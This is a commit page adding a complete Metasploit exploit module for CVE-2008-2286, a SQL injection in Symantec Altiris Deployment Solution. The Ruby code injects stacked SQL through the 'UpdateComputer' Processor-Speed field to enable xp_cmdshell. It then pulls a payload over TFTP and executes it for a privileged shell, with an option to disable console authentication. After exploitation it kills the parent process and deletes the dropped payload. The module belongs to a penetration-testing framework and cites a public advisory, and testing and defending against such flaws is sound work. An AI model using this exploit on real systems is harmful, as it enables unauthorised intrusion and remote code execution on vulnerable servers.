Land #2517, @3v0lver's exploit for cve-2008-2286

2013-11-08 08:41:04 -06:00 · 2013-11-08 08:41:04 -06:00 · d419c73488
parent bdba80c05c fddb69edb3
commit d419c73488
1 changed files with 203 additions and 0 deletions
--- a/modules/exploits/windows/misc/altiris_ds_sqli.rb
+++ b/modules/exploits/windows/misc/altiris_ds_sqli.rb
@ -0,0 +1,203 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/framework/
+##
+
+require 'msf/core'
+class Metasploit3 < Msf::Exploit::Remote
+ Rank = NormalRanking
+
+ include Msf::Exploit::CmdStagerTFTP
+ include Msf::Exploit::Remote::Tcp
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Symantec Altiris DS SQL Injection',
+      'Description'    => %q{
+        This module exploits a SQL injection flaw in Symantec Altiris Deployment Solution 6.8
+        to 6.9.164. The vulnerability exists on axengine.exe which fails to adequately sanitize
+        numeric input fields in "UpdateComputer" notification Requests. In order to spawn a shell,
+        several SQL injections are required in close succession, first to enable xp_cmdshell, then
+        retrieve the payload via TFTP and finally execute it. The module also has the capability
+        to disable or enable local application authentication. In order to work the target system
+        must have a tftp client available.
+      },
+      'Author'         =>
+        [
+          'Brett Moore',  # Vulnerability discovery
+          '3v0lver'       # Metasploit module
+        ],
+      'License'        => MSF_LICENSE,
+      'References'     =>
+        [
+          [ 'CVE', '2008-2286' ],
+          [ 'OSVDB', '45313' ],
+          [ 'BID', '29198'],
+          [ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-08-024' ]
+        ],
+      'DefaultOptions' =>
+        {
+          'EXITFUNC' => 'process',
+        },
+      'Targets' =>
+        [
+          [ 'Windows 2003 (with tftp client available)',
+            {
+              'Arch' => ARCH_X86,
+              'Platform' => 'win'
+            }
+          ]
+        ],
+      'Privileged' => true,
+      'Platform' => 'win',
+      'DisclosureDate' => 'May 15 2008',
+      'DefaultTarget' => 0))
+
+    register_options(
+    [
+      Opt::RPORT(402),
+      OptBool.new('XP_CMDSHELL',      [ true, "Enable xp_cmdshell prior to exploit", true]),
+      OptBool.new('DISABLE_SECURITY', [ true, "Exploit SQLi to execute wc_upd_disable_security and disable Console Authentication", false ]),
+      OptBool.new('ENABLE_SECURITY',  [ true, "Enable Local Deployment Console Authentication", false ])
+    ], self.class)
+
+  end
+
+  def execute_command(cmd, opts = {})
+    inject=[]
+
+    if @xp_shell_enable
+      inject+=[
+        "#{Rex::Text.to_hex("sp_configure \"show advanced options\", 1; reconfigure",'')}",
+        "#{Rex::Text.to_hex("sp_configure \"xp_cmdshell\", 1; reconfigure",'')}",
+      ]
+      @xp_shell_enable = false
+    end
+
+    if @wc_disable_security
+      inject+=["#{Rex::Text.to_hex("wc_upd_disable_security",'')}"]
+      @wc_disable_security = false
+    end
+
+    if @wc_enable_security
+      inject+=["#{Rex::Text.to_hex("wc_upd_enable_security",'')}"]
+      @wc_enable_security = false
+    end
+
+    inject+=["#{Rex::Text.to_hex("master.dbo.xp_cmdshell \'cd %TEMP% && cmd.exe /c #{cmd}\'",'')}"] if cmd != nil
+
+    inject.each do |sqli|
+      send_update_computer("2659, null, null;declare @querya VARCHAR(255);select @querya = 0x#{sqli};exec(@querya);--")
+    end
+  end
+
+ def send_update_computer(processor_speed)
+   notification = %Q|Request=UpdateComputer
+OS-Bit=32
+CPU-Arch=x86
+IP-Address=192.168.20.107
+MAC-Address=005056C000AB
+Name=Remove_test
+OS=Windows XP
+Version=2.6-38 (32-Bit)
+LoggedIn=Yes
+Boot-Env=Automation
+Platform=Linux
+Agent-Settings=Same
+Sys-Info-TimeZoneBias=0
+Processor=Genuine Intel Intel(R) Core(TM) i7 CPU M 620 @ 2.67GHz
+Processor-Speed=#{processor_speed}
+   \x00
+   |
+
+   connect
+   sock.put(notification)
+   response = sock.get_once()
+   disconnect
+
+   return response
+ end
+
+  def check
+    res = send_update_computer("2659")
+
+    unless res and res =~ /Result=Success/ and res=~ /DSVersion=(.*)/
+      return Exploit::CheckCode::Unknown
+    end
+
+    version = $1
+
+    unless version =~ /^6\.(\d+)\.(\d+)$/
+      return Exploit::CheckCode::Safe
+    end
+
+    print_status "#{rhost}:#{rport} - Altiris DS Version '#{version}'"
+
+    minor = $1.to_i
+    build = $2.to_i
+
+    if minor == 8
+      if build == 206 || build == 282 || build == 378
+        return Exploit::CheckCode::Vulnerable
+      elsif build < 390
+        return Exploit::CheckCode::Appears
+      end
+    elsif minor == 9 and build < 176
+      #The existence of versions matching this profile is a possibility... none were observed in the wild though
+      #as such, we're basing confidence off of Symantec's vulnerability bulletin.
+      return Exploit::CheckCode::Appears
+    end
+
+    return Exploit::CheckCode::Safe
+  end
+
+  def exploit
+    @wc_disable_security = datastore['DISABLE_SECURITY']
+    @wc_enable_security = datastore['ENABLE_SECURITY']
+    @xp_shell_enable = datastore['XP_CMDSHELL']
+
+    # CmdStagerVBS was tested here as well, however delivery took roughly
+    # 30 minutes and required sending almost 350 notification messages.
+    # size constraint requirement for SQLi is: linemax => 393
+    execute_cmdstager({ :delay => 1.5, :temp => '%TEMP%\\'})
+  end
+
+  def on_new_session(client)
+    return if not payload_exe
+
+    #can't scrub dropped payload while the process is still active so...
+    #iterate through process list, find our process and the associated
+    #parent process ID, Kill the parent.
+    #This module doesn't use FileDropper because of timing issues when
+    #using migrate -f and FileDropper. On the other hand PrependMigrate
+    #has been avoided because of issues with reverse_https payload
+    #SeeRM#8365 https://http://dev.metasploit.com/redmine/issues/8365
+
+    unless client.type == "meterpreter"
+      print_error("Automatic cleanup only available with meterpreter, please delete #{payload_exe} manually")
+      return
+    end
+
+    client.core.use("stdapi") unless client.ext.aliases.include?("stdapi")
+    # migrate
+    print_status("Migrating ...")
+    client.console.run_single("run migrate -f")
+    # kill the parent process so the payload can hopefully be dropped
+    print_status("Kill parent process ...")
+    client.sys.process.get_processes().each do |proc|
+      if proc['pid'] == client.sys.process.open.pid
+          client.sys.process.kill(proc['ppid'])
+      end
+    end
+
+    win_temp = client.fs.file.expand_path("%TEMP%")
+    win_file = "#{win_temp}\\#{payload_exe}"
+    print_status("Attempting to delete #{win_file} ...")
+    client.shell_command_token(%Q|attrib.exe -r #{win_file}|)
+    client.fs.file.rm(win_file)
+    print_good("Deleted #{win_file}")
+  end
+
+end